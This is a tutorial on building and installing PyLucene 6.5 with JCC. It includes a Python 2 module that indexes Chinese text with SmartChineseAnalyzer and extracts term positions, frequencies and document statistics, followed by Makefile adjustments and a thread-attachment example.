Installing and Using PyLucene

2020-12-19 09:17:01

  Lucene is a sub-project of the Apache Software Foundation's Jakarta project: an open-source full-text retrieval engine toolkit. It is not a complete full-text search engine but rather an architecture for one, providing a complete query engine and indexing engine, plus partial text-analysis engines (for two Western languages, English and German).
  Lucene's goal is to give software developers a simple, easy-to-use toolkit for adding full-text search to a target system, or for building a complete full-text search engine on top of it. It is an indexing and search library rather than a finished application, and it can build indexes that include term position information.
  There are two main ways to use Lucene: write your own program that calls the library, or use a third-party program built on Lucene, such as Solr.
  Many search engines draw on Lucene's implementation; Whoosh, a Python search tool, is also modeled on Lucene. PyLucene is the Python version of Lucene, "compiled" with JCC. The installation and usage steps follow.

Installation

  1. PyLucene needs a Java environment, so install Java first and set JAVA_HOME.
  2. Download pylucene 6.5 and unpack it.
  3. Enter the unpacked pylucene-6.5 directory, then run:
    1. $ pushd jcc
    2. <edit setup.py to match your environment> # mainly check that the Java directory is correct
    3. $ python setup.py build
    4. $ sudo python setup.py install
    5. $ popd
    6. <edit Makefile to match your environment> # see the appendix for the exact changes
    7. $ make
    8. $ make test (look for failures)
    9. $ sudo make install
  4. Verify the installation: if import lucene succeeds in Python, PyLucene was installed successfully, as in the quick check below.
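
For example, a minimal smoke test (initVM must be called once per process before any Lucene class is used; lucene.VERSION should then report 6.5.0):

$ python
>>> import lucene
>>> lucene.initVM()    # start the embedded JVM, once per process
>>> print 'lucene', lucene.VERSION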

Usage

For usage, refer to the official API docs as well as the Java API; PyLucene's interface closely mirrors Lucene's. The module below indexes Chinese text with SmartChineseAnalyzer and reads positions, term statistics, and document statistics back out of the index:

#!/usr/bin/env python
# coding: utf-8
import time
import os
import logging
import shutil

import lucene
from org.apache.lucene.analysis.cn.smart import SmartChineseAnalyzer
from org.apache.lucene.document import Document, Field, FieldType
from org.apache.lucene.index import DirectoryReader, PostingsEnum,\
    SlowCompositeReaderWrapper, IndexWriter, IndexWriterConfig,\
    IndexOptions, MultiFields
from org.apache.lucene.queryparser.classic import QueryParser
from org.apache.lucene.search import DocIdSetIterator, IndexSearcher,\
    ScoreDoc, TopDocs
from org.apache.lucene.store import FSDirectory
from org.apache.lucene.util import BytesRef, BytesRefIterator
from java.nio.file import Paths
from flask import current_app as app
from service import tabledef

BASE_PATH = os.path.dirname(os.path.abspath(__file__))
INDEX_DIR = os.path.join(BASE_PATH, tabledef.IndexSettings.path)
logger = logging.getLogger(tabledef.IndexSettings.logger_name)


def separateQuery(query):
    '''separate query with SmartChineseAnalyzer
    Args:
        query: str
    Return:
        word_list: list
    '''
    docContentField = ''
    parser = QueryParser(docContentField, SmartChineseAnalyzer())
    query = parser.parse(query)
    word_list = query.toString().split(' ')
    return word_list


def getQueryPositionsAndFreqs(query, field, reader):
    '''return query positions in the documents
    Args:
        query: unicode
        field: unicode, the field in the index
        reader: DirectoryReader opened on the index
    Return:
        dict: {word: {document_id: [position(int) list]}}
        dict: {word_order: {docid: freq}}
        list: docid list
    '''
    positions = {}
    freqs = {}
    doc_list = set()
    words = separateQuery(query)
    logger.debug('open index: %s', reader)
    atomic_reader = SlowCompositeReaderWrapper.wrap(reader)
    field_reader = atomic_reader.terms(field)
    if field_reader is None:
        raise KeyError("Can't find the field: %s" % field)
    terms_enum = field_reader.iterator()
    for word_order, word in enumerate(words):
        # clear the previous word's results before each new lookup
        search_positions = {}
        id_freq = {}
        logger.debug('search word: %s', word)
        if_found = terms_enum.seekExact(BytesRef(word))
        # This check is required: if the word is not in the index, the enum
        # is left positioned on some other term, which easily produces hits
        # for a word that has none. See
        # http://lucene.apache.org/core/6_5_0/core/index.html
        if not if_found:
            freqs[word_order] = {}
            continue
        docs = terms_enum.postings(None, PostingsEnum.POSITIONS)
        if not docs:
            freqs[word_order] = {}
            continue
        docid = docs.nextDoc()
        while docid != DocIdSetIterator.NO_MORE_DOCS:
            doc_list.add(docid)
            position_list = []
            freq = docs.freq()
            id_freq[docid] = freq
            for i in range(freq):
                position_list.append(docs.nextPosition())
            search_positions[docid] = position_list
            docid = docs.nextDoc()
        freqs[word_order] = id_freq
        positions[word] = search_positions
    return positions, freqs, list(doc_list)


def getDocStats(field, reader):
    '''return document statistics for a field of the index
    Args:
        field: unicode, the field in the index
        reader: DirectoryReader opened on the index
    Return:
        doc_num: int
        doc_length_map: dict, {docid: doc_len}
        avg_doc_length: float
    '''
    total_dl = 0
    doc_length_map = {}
    doc_num = reader.numDocs()
    for docid in range(doc_num):
        doc_len = 0
        term_num = 0
        terms = reader.getTermVector(docid, field)
        if terms and terms.size() > 0:
            terms_enum = terms.iterator()
            for term in BytesRefIterator.cast_(terms_enum):
                freq = terms_enum.totalTermFreq()
                doc_len += freq
                term_num += 1
        total_dl += doc_len
        doc_length_map[docid] = doc_len
    avg_doc_length = total_dl * 1.0 / doc_num
    return doc_num, doc_length_map, avg_doc_length


def getTermStats(field, reader):
    '''Find all terms of a field in the reader
    Args:
        field: str, the field to scan
        reader: DirectoryReader opened on the index
    Return:
        dict: {term(str): doc frequency(int), ...}
    Raise:
        KeyError: when the field cannot be found in the index'''
    result = {}
    fields = MultiFields.getFields(reader)
    terms = fields.terms(field)
    if not terms:
        raise KeyError("Can't find the field: %s" % field)
    iterator = terms.iterator()
    for term in BytesRefIterator.cast_(iterator):
        term_name = term.utf8ToString()
        doc_freq = iterator.docFreq()
        result[term_name] = doc_freq
    return result


def getIndexPath(index_dir):
    """Build the index directory path from index_dir
    """
    if index_dir:
        index_dir = os.path.join(
            INDEX_DIR, tabledef.IndexSettings.sub_path + index_dir)
    else:
        index_dir = INDEX_DIR
    return index_dir


class CrterIndex(object):

    def __init__(self):
        if app.cache.has_key('vm'):
            # app.java_vm['vm'].attachCurrentThread()
            logger.debug('javaVM exists: %s', app.cache['vm'])
        else:
            vm = lucene.initVM()
            app.cache['vm'] = vm
            logger.debug('init javaVM: %s', vm)

    def createIndex(self, data, index_dir=None):
        '''create index
        Args:
            data: [{key: data}, {} ... {}], a list of dicts; each key becomes a field
            index_dir: str, index path, default is INDEX_DIR
        '''
        index_dir = getIndexPath(index_dir)
        logger.debug('create index: %s', index_dir)
        index = FSDirectory.open(Paths.get(index_dir))
        analyzer = SmartChineseAnalyzer()
        config = IndexWriterConfig(analyzer)
        config.setOpenMode(IndexWriterConfig.OpenMode.CREATE)
        writer = IndexWriter(index, config)
        ft = FieldType()
        ft.setStored(True)
        ft.setTokenized(True)
        ft.setStoreTermVectors(True)
        ft.setStoreTermVectorOffsets(True)
        ft.setStoreTermVectorPositions(True)
        ft.setIndexOptions(IndexOptions.DOCS_AND_FREQS_AND_POSITIONS)
        for dict_data in data:
            doc = Document()
            # logger.debug('add field: %s', dict_data)
            for key in dict_data:
                # logger.debug('field data: %s', key)
                doc.add(Field(key, unicode(dict_data[key]), ft))
            writer.addDocument(doc)
        writer.commit()
        writer.close()
        index.close()

    def removeIndex(self, index_dir=None):
        """Remove the index directory
        Args:
            index_dir: str, default is None, which means INDEX_DIR
        Return:
            None"""
        index_dir = getIndexPath(index_dir)
        try:
            shutil.rmtree(index_dir)
            os.mkdir(index_dir)
            logger.debug('remove all files in index: %s', index_dir)
        except Exception, e:
            logger.warn(e)


if __name__ == '__main__':
    lucene.initVM(vmargs=['-Djava.awt.headless=true'])
    print 'lucene', lucene.VERSION
    # data = [{"id": "592e42958fb0fe10a2816719", "question": "劳动者解除劳动合同的经济补偿金", "answer": "劳动者自身原因离职的除非用人单位同意支付经济补偿金,否则在这种情况下法律并没有规定劳动者主动解除劳动合同也应获经济补偿金"},
    #         {"id": "592e42958fb0fe10a281671a", "question": "劳动者被迫解除劳动合同", "answer": "被迫解除是因为用人单位有法定情形损害劳动者权益时,劳动者被迫提出的解除劳动合同;"},
    #         {"id": "592e42958fb0fe10a281671b", "question": "劳动者主动解除劳动合同", "answer": "主动解除是指劳动者由于个人原因选择离开"}]
    # createIndex(data)
    index = FSDirectory.open(Paths.get(INDEX_DIR))
    reader = DirectoryReader.open(index)
    result = getQueryPositionsAndFreqs('刑法', 'question', reader)
    logger.debug('getQueryPositions: %s', result)
    result = getTermStats('question', reader)
    logger.debug('getTermStats: %s', result)
    result = getDocStats('question', reader)
    logger.debug('getDocStats: %s', result)
    reader.close()
    index.close()
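
Note that the module imports IndexSearcher, ScoreDoc, and TopDocs but never runs a ranked query. A minimal search sketch that reuses the imports above (the top_n cutoff is illustrative, and the field must have been stored at index time, as createIndex does):

def searchIndex(query_text, field, reader, top_n=10):
    '''Parse query_text with SmartChineseAnalyzer and print the best hits.'''
    searcher = IndexSearcher(reader)
    parser = QueryParser(field, SmartChineseAnalyzer())
    query = parser.parse(query_text)
    top_docs = searcher.search(query, top_n)   # a TopDocs holding the top_n best hits
    for score_doc in top_docs.scoreDocs:       # each hit is a ScoreDoc
        doc = searcher.doc(score_doc.doc)      # load the stored document
        print score_doc.score, doc.get(field)
    return top_docs.totalHits

Called as searchIndex(u'劳动合同', 'question', reader) inside the __main__ block, it prints each matching question with its score.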

Appendix

Changes to the Makefile

Adjust these according to your system version, for example:

  76 # Linux (Debian Jessie 64-bit, Python 2.7.9, Oracle Java 1.8)
  77 # Be sure to also set JDK['linux2'] in jcc's setup.py to the JAVA_HOME value
  78 # used below for ANT (and rebuild jcc after changing it).
  79 PREFIX_PYTHON=/usr   # verified on CentOS, works together with line 81
  80 ANT=JAVA_HOME=/usr/lib/jvm/java-8-oracle /usr/bin/ant   # adjust to your JAVA_HOME
  81 PYTHON=$(PREFIX_PYTHON)/bin/python
  82 JCC=$(PYTHON) -m jcc --shared   # keep --shared if threads must share the JVM; see the sketch after this listing
  83 NUM_FILES=8
  # To enable SmartChineseAnalyzer word segmentation, also change:
  137 #JARS+=$(SMARTCN_JAR) # smart chinese analyzer   <- uncomment this line
  318 --exclude org.apache.lucene.sandbox.queries.regex.JakartaRegexpCapabilities \   # already present in the file
  319 --exclude org.apache.lucene.analysis.cn.smart.AnalyzerProfile \   # line to add
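
When the JVM is built with --shared, it can be shared by multiple threads, but every thread other than the one that called initVM must attach itself to the VM before touching any Lucene class (this is what the commented-out attachCurrentThread call in CrterIndex.__init__ is for). A minimal sketch:

import threading
import lucene

lucene.initVM()    # once, in the main thread

def worker():
    # non-main threads must attach to the shared JVM before any Lucene call
    lucene.getVMEnv().attachCurrentThread()
    # ... Lucene calls are now safe in this thread ...

t = threading.Thread(target=worker)
t.start()
t.join()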

Verify that it was added successfully:

  $ python
  >>> import lucene
  >>> from org.apache.lucene.analysis.cn.smart import SmartChineseAnalyzer    # a successful import means it was added


Attachment:

pylucene-6.5.0-src.tar.gz
